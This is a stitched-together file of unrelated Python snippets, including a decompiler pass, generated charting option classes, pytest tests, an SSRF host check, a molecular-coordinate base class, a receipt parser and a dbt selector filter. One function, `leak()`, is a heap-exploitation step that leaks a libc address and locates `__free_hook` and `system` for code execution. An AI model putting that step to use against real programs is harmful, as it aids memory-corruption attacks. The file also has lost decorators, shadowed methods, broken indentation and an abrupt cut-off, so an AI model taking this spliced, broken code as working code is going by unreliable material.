        """Assignments that write through *pointer* or pass it to a call."""
        dangerous_uses = set()
        for use in self._use_map.get(pointer):
            if (not isinstance(use, Assignment)):
                continue
            if (self._is_dereference(use.destination) and (pointer in use.destination.requirements)):
                dangerous_uses.add(use)
            elif (self._is_call_assignment(use) and (pointer in use.value.requirements)):
                dangerous_uses.add(use)
        return dangerous_uses

    def _iter_aliased_variables(self, expression: DataflowObject) -> Iterator[Variable]:
        """Yield every aliased Variable appearing anywhere in *expression*."""
        for expression in self._find_subexpressions(expression):
            if self._is_aliased_variable(expression):
                (yield expression)

    def _find_subexpressions(expression: DataflowObject) -> Iterator[Expression]:
        """Depth-first walk over *expression* and all nested subexpressions."""
        todo = [expression]
        while (todo and (subexpression := todo.pop())):
            todo.extend(subexpression)
            (yield subexpression)

    def _is_phi(instruction: Instruction) -> bool:
        return isinstance(instruction, Phi)

    def _is_call_assignment(instruction: Instruction) -> bool:
        # x = call(...)
        return (isinstance(instruction, Assignment) and isinstance(instruction.value, Call))

    def _defines_unknown_expression(instruction: Instruction) -> bool:
        return (isinstance(instruction, Assignment) and isinstance(instruction.value, UnknownExpression))

    def _is_address(expression: Expression) -> bool:
        # &x
        return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.address))

    def _is_dereference(expression: Expression) -> bool:
        # *x
        return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.dereference))

    def _is_aliased_variable(expression: Expression) -> bool:
        return (isinstance(expression, Variable) and expression.is_aliased)

    def _contains_global_variable(expression: Assignment) -> bool:
        """True when either side of the assignment references a GlobalVariable."""
        for expr in expression.destination.requirements:
            if isinstance(expr, GlobalVariable):
                return True
        for expr in expression.value.requirements:
            if isinstance(expr, GlobalVariable):
                return True
        return False

    def _is_copy_assignment(instruction: Instruction) -> bool:
        # x = y (right-hand side is a single atom).
        return (isinstance(instruction, Assignment) and (instruction.value.complexity == 1))

    def _is_variable_contraction(expression: Expression) -> bool:
        # A truncating cast of a single variable, e.g. (char) x.
        return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.cast) and expression.contraction and (expression.operand.complexity == 1))

    def _is_aliased_redefinition(self, aliased_variable: Variable, instruction: Instruction):
        """True when *instruction* copies one aliased SSA version of
        *aliased_variable* into another (same base name on both sides)."""
        return (isinstance(instruction, Assignment) and self._is_aliased_variable(instruction.destination) and self._is_aliased_variable(instruction.value) and (instruction.destination.name == aliased_variable.name == instruction.value.name))
def prepServers(dut_list, args, profile):
    """Prepare every DUT for a run: start AoE servers/SSH tunnels for remote
    devices, derive capacity-based offsets, and set the job scaling factor."""
    for dut in dut_list:
        if not dut.inLocalMode():
            startAoeServer(dut)
            if args.tunneling == 'y':
                startSshTunnel(dut)
                # Remember which host answers on this tunnel port.
                fio_json_parser.tunnel2host[dut.sshTunnelPort] = dut.serverName
        if dut.capacity:
            # 1/32 of the capacity expressed in MiB, with a random start offset.
            dut.increment = int(float(dut.capacity) / (2 ** 20) / 32)
            dut.offset = randint(0, dut.increment)
        dut.numjobs *= args.job_scale
        if args.factor > 0.0:
            # An explicit positive factor always wins.
            dut.factor = args.factor
        elif profile['scale_by_capacity'] != 'N':
            dut.factor = getMultiplier(dut.capacity)
        else:
            dut.factor = 1.0
class OptionPlotoptionsErrorbarSonificationTracksMappingGapbetweennotes(Options):
    """Accessors for the gapBetweenNotes mapping of errorbar sonification tracks.

    NOTE(review): every option appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were apparently lost in
    extraction, so as written each second def shadows the first — confirm
    against the generated original.
    """

    def mapFunction(self):
        # Getter: configured mapping function (None when unset).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store the mapping function verbatim.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: target property of the mapping.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Getter: context the min/max range is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
# NOTE(review): the leading-dot line below looks like a pytest decorator whose
# '@pytest.mark' prefix was lost in extraction — confirm against the original.
.usefixtures('use_tmpdir')
def test_that_config_path_is_the_directory_of_the_main_ert_config():
    """<CONFIG_PATH> in an installed forward-model job must expand to the
    directory containing the main ert config file (the cwd in this test)."""
    os.mkdir('jobdir')
    # Minimal job definition echoing the <CONFIG_PATH> magic string.
    with open('jobdir/job_file', 'w', encoding='utf-8') as fout:
        fout.write(dedent('\n EXECUTABLE echo\n ARGLIST <CONFIG_PATH>\n '))
    with open('config_file.ert', 'w', encoding='utf-8') as fout:
        fout.write('NUM_REALIZATIONS 1\n')
        fout.write('INSTALL_JOB job_name jobdir/job_file\n')
        fout.write('FORWARD_MODEL job_name')
    ert_config = ErtConfig.from_file('config_file.ert')
    # The job's argList should contain exactly the config file's directory.
    assert (ert_config.forward_model_data_to_json('', 0, 0)['jobList'][0]['argList'] == [os.getcwd()])
def test_cast(base):
    """Exercise etype casting: explicit-target failures, single images, audio,
    arrays, unions, and the Any fallback."""
    # Casting nothing, or a text file, to Image must fail.
    with pytest.raises(EtypeCastError):
        cast(base.id, [], Etype.Image)
    with pytest.raises(EtypeCastError):
        cast(base.id, [base.txt1], Etype.Image)
    t1 = cast(base.id, [base.im1], to=Etype.Image)
    assert (len(t1.paths) == 1)
    assert (t1.et == Etype.Image)
    # Inferred casts: empty input still fails.
    with pytest.raises(EtypeCastError):
        cast(base.id, [])
    i1 = cast(base.id, [base.im1])
    assert (len(i1.paths) == 1)
    assert (i1.et == Etype.Image)
    i2 = cast(base.id, [base.im2])
    assert (len(i2.paths) == 1)
    assert (i2.et == Etype.Image)
    ia1 = cast(base.id, [base.im1, base.im2])
    assert (len(ia1.paths) == 2)
    assert (ia1.et == Array(Etype.Image))
    a1 = cast(base.id, base.aud1)
    assert (len(a1.paths) == 1)
    assert (a1.et == Etype.Audio)
    ai1 = cast(base.id, [base.im3, base.aud1])
    assert (len(ai1.paths) == 2)
    assert (ai1.et == Union(Etype.Image, Etype.Audio))
    # BUG FIX: these assertions previously re-checked ai1 instead of ai2,
    # leaving the audio-first ordering unverified.
    ai2 = cast(base.id, [base.aud1, base.im2])
    assert (len(ai2.paths) == 2)
    assert (ai2.et == Union(Etype.Image, Etype.Audio))
    iaa1 = cast(base.id, [base.im1, base.im2, base.aud1])
    assert (len(iaa1.paths) == 3)
    assert (iaa1.et == Union(Array(Etype.Image), Etype.Audio))
    any1 = cast(base.id, [base.im1, base.im2, base.aud1, base.txt1])
    assert (len(any1.paths) == 4)
    assert (any1.et == Etype.Any)
class TestMostCommonValueShare(BaseFeatureDataQualityMetricsTest):
    """Data-quality test for the share taken by a column's most common value."""
    name: ClassVar = 'Share of the Most Common Value'

    def get_stat(self, current: NumericCharacteristics):
        # The statistic under test is the most-common-value percentage.
        return current.most_common_percentage

    def get_condition_from_reference(self, reference: Optional[ColumnCharacteristics]) -> TestValueCondition:
        """Derive the condition from reference data; default is share < 0.8."""
        if (reference is not None):
            if (not isinstance(reference, (NumericCharacteristics, CategoricalCharacteristics, DatetimeCharacteristics))):
                raise ValueError(f'{self.column_name} should be numerical, categorical or datetime')
            reference_share = reference.most_common_percentage
            if (reference_share is not None):
                # Expect the current share to match the reference within 10%.
                return TestValueCondition(eq=approx(reference_share / 100.0, relative=0.1))
        return TestValueCondition(lt=0.8)

    def calculate_value_for_test(self) -> Optional[Numeric]:
        """Return the current most-common-value share as a fraction, or None."""
        current_stats = self.metric.get_result().current_characteristics
        if isinstance(current_stats, TextCharacteristics):
            raise ValueError(f'{self.column_name} should be numerical, categorical or datetime')
        share = current_stats.most_common_percentage
        return None if share is None else share / 100.0

    def get_description(self, value: Numeric) -> str:
        """Human-readable result naming the most common value and its share."""
        counts = self.metric.get_result().plot_data.counts_of_values
        if counts is None:
            raise ValueError('counts_of_values should be provided')
        most_common_value = counts['current'].iloc[0, 0]
        return f'The most common value in the column **{self.column_name}** is {most_common_value}. Its share is {value:.3g}. The test threshold is {self.get_condition()}.'

    def get_parameters(self) -> ColumnCheckValueParameters:
        return ColumnCheckValueParameters(column_name=self.column_name.display_name, condition=self.get_condition(), value=self._value)
def deny_unsafe_hosts(host: str) -> str:
    """Validate that *host* does not resolve to a loopback or link-local address.

    Returns the host unchanged when safe, or immediately in dev mode.
    Raises ValueError when resolution fails or the address is unsafe.

    NOTE: resolution happens once, here — a DNS rebind after this check is
    not caught (TOCTOU); callers needing stronger guarantees must pin the IP.
    """
    if CONFIG.dev_mode:
        # Local development commonly targets loopback; skip the check entirely.
        return host
    try:
        host_ip: Union[(IPv4Address, IPv6Address)] = ip_address(socket.gethostbyname(host))
    except socket.gaierror as err:
        # Chain the resolver error so the original cause is preserved (B904).
        raise ValueError(f'Failed to resolve hostname: {host}') from err
    if (host_ip.is_link_local or host_ip.is_loopback):
        raise ValueError(f"Host '{host}' with IP Address '{host_ip}' is not safe!")
    return host
class TableEditorToolbar(HasPrivateTraits):
    """wx toolbar shown above a TableEditor, exposing sort/move/search/add/
    delete/preferences actions depending on the editor factory's settings."""

    # Toolbar actions; 'enabled': False entries are toggled on selection changes.
    no_sort = Instance(Action, {'name': 'No Sorting', 'tooltip': 'Do not sort columns', 'action': 'on_no_sort', 'enabled': False, 'image': ImageResource('table_no_sort.png')})
    move_up = Instance(Action, {'name': 'Move Up', 'tooltip': 'Move current item up one row', 'action': 'on_move_up', 'enabled': False, 'image': ImageResource('table_move_up.png')})
    move_down = Instance(Action, {'name': 'Move Down', 'tooltip': 'Move current item down one row', 'action': 'on_move_down', 'enabled': False, 'image': ImageResource('table_move_down.png')})
    search = Instance(Action, {'name': 'Search', 'tooltip': 'Search table', 'action': 'on_search', 'image': ImageResource('table_search.png')})
    add = Instance(Action, {'name': 'Add', 'tooltip': 'Insert new item', 'action': 'on_add', 'image': ImageResource('table_add.png')})
    delete = Instance(Action, {'name': 'Delete', 'tooltip': 'Delete current item', 'action': 'on_delete', 'enabled': False, 'image': ImageResource('table_delete.png')})
    prefs = Instance(Action, {'name': 'Preferences', 'tooltip': 'Set user preferences for table', 'action': 'on_prefs', 'image': ImageResource('table_prefs.png')})
    # The TableEditor this toolbar belongs to.
    editor = Instance(TableEditor)
    # The underlying wx toolbar control (created in __init__ when any action applies).
    control = Any()

    def __init__(self, parent=None, **traits):
        """Assemble the action list from the editor factory's flags and build
        the wx toolbar; self.control stays None when no action applies."""
        super().__init__(**traits)
        editor = self.editor
        factory = editor.factory
        actions = []
        if (factory.sortable and (not factory.sort_model)):
            actions.append(self.no_sort)
        if ((not editor.in_column_mode) and factory.reorderable):
            actions.append(self.move_up)
            actions.append(self.move_down)
        if (editor.in_row_mode and (factory.search is not None)):
            actions.append(self.search)
        if factory.editable:
            if ((factory.row_factory is not None) and (not factory.auto_add)):
                actions.append(self.add)
            if (factory.deletable and (not editor.in_column_mode)):
                actions.append(self.delete)
        if factory.configurable:
            actions.append(self.prefs)
        if (len(actions) > 0):
            toolbar = ToolBar(*actions, image_size=(16, 16), show_tool_names=False, show_divider=False)
            self.control = toolbar.create_tool_bar(parent, self)
            self.control.SetBackgroundColour(parent.GetBackgroundColour())
            # Explicit size: 23px per button at 16px icon height.
            self.control.SetSize(wx.Size((23 * len(actions)), 16))

    # --- pyface ActionController interface -------------------------------
    def add_to_menu(self, menu_item):
        """ActionController hook: menus are not used here (no-op)."""
        pass

    def add_to_toolbar(self, toolbar_item):
        """ActionController hook: default toolbar handling suffices (no-op)."""
        pass

    def can_add_to_menu(self, action):
        return True

    def can_add_to_toolbar(self, action):
        return True

    def perform(self, action, action_event=None):
        # Dispatch a toolbar click to the editor method named by the action.
        getattr(self.editor, action.action)()
def add_types_to_namespaces(files, pkg, pkg_module):
    """Re-home cppyy-generated entities onto *pkg_module*.

    Namespaces are attached first; enum values and Im*-prefixed types are
    attached to pkg_module.ImGui afterwards.  (Statement grouping inferred
    from syntax — the dump carries no indentation.)
    """
    for file_entry in files:
        deferred_children = []
        for child in file_entry['children']:
            top_name = child['name'].split('::')[0]
            if child['kind'] != 'namespace':
                # Non-namespace entities need their namespace attached first.
                deferred_children.append(child)
                continue
            entity = getattr(cppyy.gbl, top_name)
            # Only claim entities cppyy has not already re-homed.
            if getattr(entity, '__module__', None) == 'cppyy.gbl':
                entity.__module__ = pkg
                setattr(pkg_module, top_name, entity)
        for child in deferred_children:
            top_name = child['name'].split('::')[0]
            if child['kind'] == 'enum':
                # Enum values live directly on cppyy.gbl under their own names.
                for enum_value in child['enumerations']:
                    value_name = enum_value['name']
                    entity = getattr(cppyy.gbl, value_name)
                    entity.__module__ = pkg + '.ImGui'
                    setattr(pkg_module.ImGui, value_name, entity)
            elif child['kind'] not in ('typedef', 'function') and top_name.startswith('Im'):
                entity = getattr(cppyy.gbl, top_name)
                entity.__module__ = pkg + '.ImGui'
                setattr(pkg_module.ImGui, top_name, entity)
class OptionPlotoptionsPolygonSonificationTracksMappingLowpassResonance(Options):
    """Accessors for the lowpass-resonance mapping of polygon sonification tracks.

    NOTE(review): every option appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were apparently lost in
    extraction, so as written each second def shadows the first — confirm
    against the generated original.
    """

    def mapFunction(self):
        # Getter: configured mapping function (None when unset).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store the mapping function verbatim.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: target property of the mapping.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Getter: context the min/max range is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class VectorEnv(BaseEnv, ABC):
    """Abstract base for environments running *n_envs* sub-environments in lockstep.

    NOTE(review): step/reset/seed have no bodies in this dump — presumably
    abstract (decorators/ellipses lost in extraction); docstrings below serve
    as their bodies.  Confirm against the original source.
    """

    def __init__(self, n_envs: int):
        # Number of parallel sub-environments managed by this vectorized env.
        self.n_envs = n_envs

    def step(self, actions: ActionType) -> Tuple[(ObservationType, np.ndarray, np.ndarray, Iterable[Dict[(Any, Any)]])]:
        """Advance every sub-environment by one step with *actions*."""

    def reset(self):
        """Reset all sub-environments and return initial observations."""

    def seed(self, seeds: List[Any]) -> None:
        """Seed each sub-environment with the corresponding entry of *seeds*."""

    def _get_indices(self, indices):
        """Normalize *indices*: None -> all envs, int -> one-element list."""
        if (indices is None):
            indices = range(self.n_envs)
        elif isinstance(indices, int):
            indices = [indices]
        return indices
def CreateTable(connection, table_name):
    """Create the benchmark-results table *table_name* if it does not exist.

    SECURITY NOTE(review): *table_name* is interpolated into the DDL via
    str.format, not parameterized — identifiers cannot be bound as SQL
    parameters, so callers must pass only trusted/validated table names.
    """
    create_table_statement = 'CREATE TABLE IF NOT EXISTS {}(id INTEGER NOT NULL AUTO_INCREMENT,category VARCHAR(50) NOT NULL,time_of_entry DATETIME,runid VARCHAR(50),envoy_hash VARCHAR(40),total_time INTEGER UNSIGNED,time_for_1st_byte_max INTEGER UNSIGNED,time_for_1st_byte_min INTEGER UNSIGNED,time_for_1st_byte_mean INTEGER UNSIGNED,time_for_1st_byte_sd INTEGER UNSIGNED,time_for_1st_byte_sd_percent FLOAT UNSIGNED,requests_success BIGINT UNSIGNED,requests_started BIGINT UNSIGNED,requests_done BIGINT UNSIGNED,requests_timeout BIGINT UNSIGNED,requests_error BIGINT UNSIGNED,requests_fail BIGINT UNSIGNED,requests_total BIGINT UNSIGNED,total_data_BPS DOUBLE UNSIGNED,time_for_connect_max INTEGER UNSIGNED,time_for_connect_min INTEGER UNSIGNED,time_for_connect_mean INTEGER UNSIGNED,time_for_connect_sd INTEGER UNSIGNED,time_for_connect_sd_percent FLOAT UNSIGNED,req_per_sec_max INTEGER UNSIGNED,req_per_sec_min INTEGER UNSIGNED,req_per_sec_mean INTEGER UNSIGNED,req_per_sec_sd INTEGER UNSIGNED,req_per_sec_sd_percent FLOAT UNSIGNED,total_req_per_sec DOUBLE UNSIGNED,time_for_request_max INTEGER UNSIGNED,time_for_request_min INTEGER UNSIGNED,time_for_request_mean INTEGER UNSIGNED,time_for_request_sd INTEGER UNSIGNED,time_for_request_sd_percent FLOAT UNSIGNED,status_codes_2xx BIGINT UNSIGNED,status_codes_3xx BIGINT UNSIGNED,status_codes_4xx BIGINT UNSIGNED,status_codes_5xx BIGINT UNSIGNED,traffic_total_bytes BIGINT UNSIGNED,traffic_total_data_bytes BIGINT UNSIGNED,traffic_total_headers_bytes BIGINT UNSIGNED,traffic_total_savings FLOAT UNSIGNED,PRIMARY KEY (id))'
    db_utils.ExecuteAndReturnResult(connection, create_table_statement.format(table_name))
# NOTE(review): the bare string below appears to be the remnant of a registry
# decorator (e.g. @registry.schedules('slanted_triangular.v1')) lost in
# extraction — confirm against the original source.
('slanted_triangular.v1')
def slanted_triangular(max_rate: float, num_steps: int, *, cut_frac: float=0.1, ratio: int=32, decay: float=1.0, t: float=0.0) -> Iterable[float]:
    """Yield an endless slanted-triangular learning-rate schedule.

    The rate rises linearly for the first ``cut_frac`` of ``num_steps`` and
    then decays linearly; the peak equals ``max_rate`` and the floor is
    ``max_rate / ratio``.  ``t`` is the (zero-based) starting step.
    """
    cut = int((num_steps * cut_frac))
    while True:
        t += 1
        # p in [0, 1]: position on the rising or falling slope.
        if (t < cut):
            p = (t / cut)
        else:
            p = (1 - ((t - cut) / (cut * ((1 / cut_frac) - 1))))
        (yield ((max_rate * (1 + (p * (ratio - 1)))) * (1 / ratio)))
# NOTE(review): the line below appears to be the remnant of a pytest fixture
# decorator (e.g. @pytest.fixture(scope='function')) lost in extraction; as
# written it is not valid stand-alone syntax — confirm against the original.
(scope='function')
def policy_drp_action_erasure(db: Session, oauth_client: ClientDetail) -> Generator:
    """Fixture: yield an erasure Policy carrying the DRP 'deletion' action,
    with one string-rewrite Rule targeting the 'user' data category; tears the
    target, rule and policy down afterwards, tolerating prior deletion."""
    erasure_request_policy = Policy.create(db=db, data={'name': 'example erasure request policy drp', 'key': 'example_erasure_request_policy_drp', 'drp_action': 'deletion', 'client_id': oauth_client.id})
    erasure_request_rule = Rule.create(db=db, data={'action_type': ActionType.erasure.value, 'client_id': oauth_client.id, 'name': 'Erasure Request Rule DRP', 'policy_id': erasure_request_policy.id, 'masking_strategy': {'strategy': StringRewriteMaskingStrategy.name, 'configuration': {'rewrite_value': 'MASKED'}}})
    rule_target = RuleTarget.create(db=db, data={'client_id': oauth_client.id, 'data_category': DataCategory('user').value, 'rule_id': erasure_request_rule.id})
    (yield erasure_request_policy)
    # Teardown: each delete may race with test-side deletion; ignore stale rows.
    try:
        rule_target.delete(db)
    except ObjectDeletedError:
        pass
    try:
        erasure_request_rule.delete(db)
    except ObjectDeletedError:
        pass
    try:
        erasure_request_policy.delete(db)
    except ObjectDeletedError:
        pass
class OptionSeriesTreegraphSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options):
    """Accessors for the lowpass-resonance mapping of treegraph default
    instrument sonification options.

    NOTE(review): every option appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were apparently lost in
    extraction, so as written each second def shadows the first — confirm
    against the generated original.
    """

    def mapFunction(self):
        # Getter: configured mapping function (None when unset).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store the mapping function verbatim.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: target property of the mapping.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Getter: context the min/max range is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class Primitive(metaclass=abc.ABCMeta):
    """Base class for one internal coordinate (bond, angle, dihedral, ...).

    NOTE(review): ``parallel``, ``_get_cross_vec``, ``_calculate`` and ``rho``
    take no ``self`` — their @staticmethod (and possibly @abstractmethod)
    decorators were apparently lost in extraction; confirm against the
    original source.
    """

    def __init__(self, indices, periodic=False, calc_kwargs=None, cache=False):
        # Atom indices defining this coordinate.
        self.indices = list(indices)
        self.periodic = periodic
        if (calc_kwargs is None):
            calc_kwargs = ()
        # Names of instance attributes forwarded to _calculate()/_jacobian().
        self.calc_kwargs = calc_kwargs
        self.cache = cache
        self.logger = logging.getLogger('internal_coords')
        # Per-geometry caches keyed by a hash of the relevant coordinates.
        self.val_cache = {}
        self.grad_cache = {}

    def log(self, msg, lvl=logging.DEBUG):
        self.logger.log(lvl, msg)

    def log_dbg(self, msg):
        self.log(msg, lvl=logging.DEBUG)

    def parallel(u, v, thresh=1e-06):
        """True when u and v are (anti)parallel within *thresh*."""
        dot = (u.dot(v) / (norm3(u) * norm3(v)))
        return ((1 - abs(dot)) < thresh)

    def _get_cross_vec(coords3d, indices):
        """Return the Cartesian basis vector most orthogonal to the m->n axis."""
        (m, o, n) = indices
        x_dash = (coords3d[n] - coords3d[m])
        x = (x_dash / norm3(x_dash))
        cross_vecs = np.eye(3)
        # Smallest squared projection == most orthogonal basis vector.
        min_ind = np.argmin([(np.dot(cv, x) ** 2) for cv in cross_vecs])
        return cross_vecs[min_ind]

    def set_cross_vec(self, coords3d, indices):
        # Cache a reference vector (used e.g. for near-linear bends).
        self.cross_vec = self._get_cross_vec(coords3d, self.indices)
        self.log(f'Cross vector for {self} set to {self.cross_vec}')

    def _calculate(*, coords3d, indices, gradient, **kwargs):
        """Compute the coordinate value (and gradient) — subclass hook."""
        pass

    def _weight(self, atoms, coords3d, indices, f_damping):
        """Weight of this coordinate — subclass hook."""
        pass

    def weight(self, atoms, coords3d, f_damping=0.12):
        return self._weight(atoms, coords3d, self.indices, f_damping)

    def rho(atoms, coords3d, indices):
        """Covalent-radius-damped closeness measure between atoms i and j."""
        (i, j) = indices
        distance = norm3((coords3d[i] - coords3d[j]))
        cov_rad_sum = (CR[atoms[i].lower()] + CR[atoms[j].lower()])
        return exp((- ((distance / cov_rad_sum) - 1)))

    def calculate(self, coords3d, indices=None, gradient=False):
        """Return the value (and gradient when requested), using the cache
        when enabled.  Cache keys hash only the atoms this primitive uses."""
        if (indices is None):
            indices = self.indices
        if self.cache:
            cur_hash = hash_arr(coords3d[indices], precision=8)
            try:
                val = self.val_cache[cur_hash]
                if gradient:
                    grad = self.grad_cache[cur_hash]
                    self.log_dbg(f"Returning cached value & gradient for hash '{cur_hash}'.")
                    return (val, grad)
                else:
                    self.log_dbg(f"Returning cached value for hash '{cur_hash}'.")
                    return val
            except KeyError:
                # Cache miss: fall through to the actual computation below.
                self.log_dbg(f"Hash '{cur_hash}' is not yet cached.")
        calc_kwargs = {key: getattr(self, key) for key in self.calc_kwargs}
        results = self._calculate(coords3d=coords3d, indices=indices, gradient=gradient, **calc_kwargs)
        if self.cache:
            if gradient:
                (val, grad) = results
                self.val_cache[cur_hash] = val
                self.grad_cache[cur_hash] = grad
            else:
                self.val_cache[cur_hash] = results
        return results

    def jacobian(self, coords3d, indices=None):
        """First derivatives w.r.t. Cartesians; delegates to subclass _jacobian."""
        if (indices is None):
            indices = self.indices
        calc_kwargs = {key: getattr(self, key) for key in self.calc_kwargs}
        return self._jacobian(coords3d=coords3d, indices=indices, **calc_kwargs)

    def __str__(self):
        return f'{self.__class__.__name__}({self.indices})'

    def __repr__(self):
        return self.__str__()
def clipper(bbox):
    """Build a function that clips GeoJSON geometries to *bbox*.

    Falls back to the identity transform when shapely's ``shape`` is not
    available (NameError), and returns the input geometry unchanged when an
    individual intersection fails.
    """
    minx, miny, maxx, maxy = bbox
    ring = [(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]
    bounds = {'type': 'Polygon', 'coordinates': [ring]}
    try:
        bbox_shape = shape(bounds)
    except NameError:
        # shapely helpers are not importable: no-op clipper.
        def func(geometry):
            return geometry
        return func

    def func(geometry):
        try:
            clipped = bbox_shape.intersection(shape(geometry))
        except (ValueError, TopologicalError):
            # Unclippable geometry: pass it through untouched.
            return geometry
        return mapping(clipped)
    return func
def leak():
    """Heap-exploitation helper: leak a libc pointer from the target process
    and derive the __free_hook and system addresses.

    Relies on module-level helpers (build/destroy/blow_up/visit), the pwntools
    tube ``io`` and the loaded ``libc`` ELF.
    """
    global free_hook_addr
    global system_addr
    # Allocate 9 chunks, free 7 (presumably filling a tcache bin), then free
    # one more so it lands in an unsorted/other bin — depends on chunk sizes;
    # confirm against the target binary.
    for i in range(9):
        build(('A' * 7))
    for i in range(7):
        destroy(i)
    destroy(7)
    blow_up()
    # Re-allocate so the leaked pointer becomes visible in the listing.
    for i in range(8):
        build(('A' * 7))
    visit()
    # Take the 6 low bytes printed right before 'Type[7]' and zero-extend to 64 bit.
    leak = u64(io.recvuntil('Type[7]', drop=True)[(- 6):].ljust(8, '\x00'))
    # 3849336 = offset of the leaked pointer from libc base for this libc build.
    libc_base = (leak - 3849336)
    free_hook_addr = (libc_base + libc.symbols['__free_hook'])
    system_addr = (libc_base + libc.symbols['system'])
    log.info(('libc base: 0x%x' % libc_base))
    log.info(('__free_hook address: 0x%x' % free_hook_addr))
    log.info(('system address: 0x%x' % system_addr))
def klippa_receipt_parser(original_response: dict) -> ReceiptParserDataClass:
    """Map a raw Klippa OCR response onto the provider-agnostic receipt
    dataclasses (customer, merchant, locale, taxes, payment, line items)."""
    data_response = original_response['data']
    customer_information = CustomerInformation(customer_name=data_response['customer_name'])
    merchant_information = MerchantInformation(merchant_name=data_response['merchant_name'], merchant_address=data_response['merchant_address'], merchant_phone=data_response['merchant_phone'], merchant_tax_id=data_response['merchant_vat_number'], merchant_siret=data_response['merchant_coc_number'], merchant_url=data_response['merchant_website'])
    locale_information = Locale(currency=data_response['currency'], language=data_response['document_language'], country=data_response['merchant_country_code'])
    taxes_information = Taxes(rate=data_response['personal_income_tax_rate'], taxes=data_response['personal_income_tax_amount'])
    payment_information = PaymentInformation(card_type=data_response['paymentmethod'], card_number=data_response['payment_card_number'])
    item_lines: List[ItemLines] = []
    for line in data_response.get('lines', []):
        # NOTE(review): 'linetimes' looks like a typo for Klippa's 'lineitems'
        # key — if so, no line items are ever collected here; verify against
        # the Klippa API response schema before changing.
        for lineitem in line.get('linetimes', []):
            item_lines.append(ItemLines(description=lineitem['description'], quantity=lineitem['quantity'], unit_price=lineitem['amount_each'], amount=lineitem['amount']))
    info_receipt = [InfosReceiptParserDataClass(customer_information=customer_information, merchant_information=merchant_information, locale=locale_information, taxes=[taxes_information], payment_information=payment_information, invoice_number=data_response['invoice_number'], date=data_response['date'], invoice_total=data_response['amount'])]
    return ReceiptParserDataClass(extracted_data=info_receipt)
class SelectorFilter():
def __init__(self, config: Config, tracking: Optional[Tracking], selector: Optional[str]=None) -> None:
self.tracking = tracking
self.selector = selector
user_dbt_runner = self._create_user_dbt_runner(config)
self.selector_fetcher = (SelectorFetcher(user_dbt_runner) if user_dbt_runner else None)
self.filter = self._parse_selector(self.selector)
def _parse_selector(self, selector: Optional[str]=None) -> FiltersSchema:
data_monitoring_filter = FiltersSchema()
if selector:
if (self.selector_fetcher and self._can_use_fetcher(selector)):
if self.tracking:
self.tracking.set_env('select_method', 'dbt selector')
node_names = self.selector_fetcher.get_selector_results(selector=selector)
return FiltersSchema(node_names=node_names, selector=selector)
else:
invocation_id_regex = re.compile('invocation_id:(.*)')
invocation_time_regex = re.compile('invocation_time:(.*)')
last_invocation_regex = re.compile('last_invocation')
tag_regex = re.compile('tag:(.*)')
owner_regex = re.compile('config.meta.owner:(.*)')
model_regex = re.compile('model:(.*)')
statuses_regex = re.compile('statuses:(.*)')
resource_types_regex = re.compile('resource_types:(.*)')
invocation_id_match = invocation_id_regex.search(selector)
invocation_time_match = invocation_time_regex.search(selector)
last_invocation_match = last_invocation_regex.search(selector)
tag_match = tag_regex.search(selector)
owner_match = owner_regex.search(selector)
model_match = model_regex.search(selector)
statuses_match = statuses_regex.search(selector)
resource_types_match = resource_types_regex.search(selector)
if last_invocation_match:
if self.tracking:
self.tracking.set_env('select_method', 'last_invocation')
data_monitoring_filter = FiltersSchema(last_invocation=True, selector=selector)
elif invocation_id_match:
if self.tracking:
self.tracking.set_env('select_method', 'invocation_id')
data_monitoring_filter = FiltersSchema(invocation_id=invocation_id_match.group(1), selector=selector)
elif invocation_time_match:
if self.tracking:
self.tracking.set_env('select_method', 'invocation_time')
data_monitoring_filter = FiltersSchema(invocation_time=invocation_time_match.group(1), selector=selector)
elif tag_match:
if self.tracking:
self.tracking.set_env('select_method', 'tag')
data_monitoring_filter = FiltersSchema(tags=[FilterSchema(values=[tag_match.group(1)])], selector=selector)
elif owner_match:
if self.tracking:
self.tracking.set_env('select_method', 'owner')
data_monitoring_filter = FiltersSchema(owners=[FilterSchema(values=[owner_match.group(1)])], selector=selector)
elif model_match:
if self.tracking:
self.tracking.set_env('select_method', 'model')
data_monitoring_filter = FiltersSchema(models=[FilterSchema(values=[model_match.group(1)])], selector=selector)
elif statuses_match:
if self.tracking:
self.tracking.set_env('select_method', 'statuses')
statuses = [Status(status) for status in statuses_match.group(1).split(',')]
data_monitoring_filter = FiltersSchema(statuses=[StatusFilterSchema(values=statuses)], selector=selector)
elif resource_types_match:
if self.tracking:
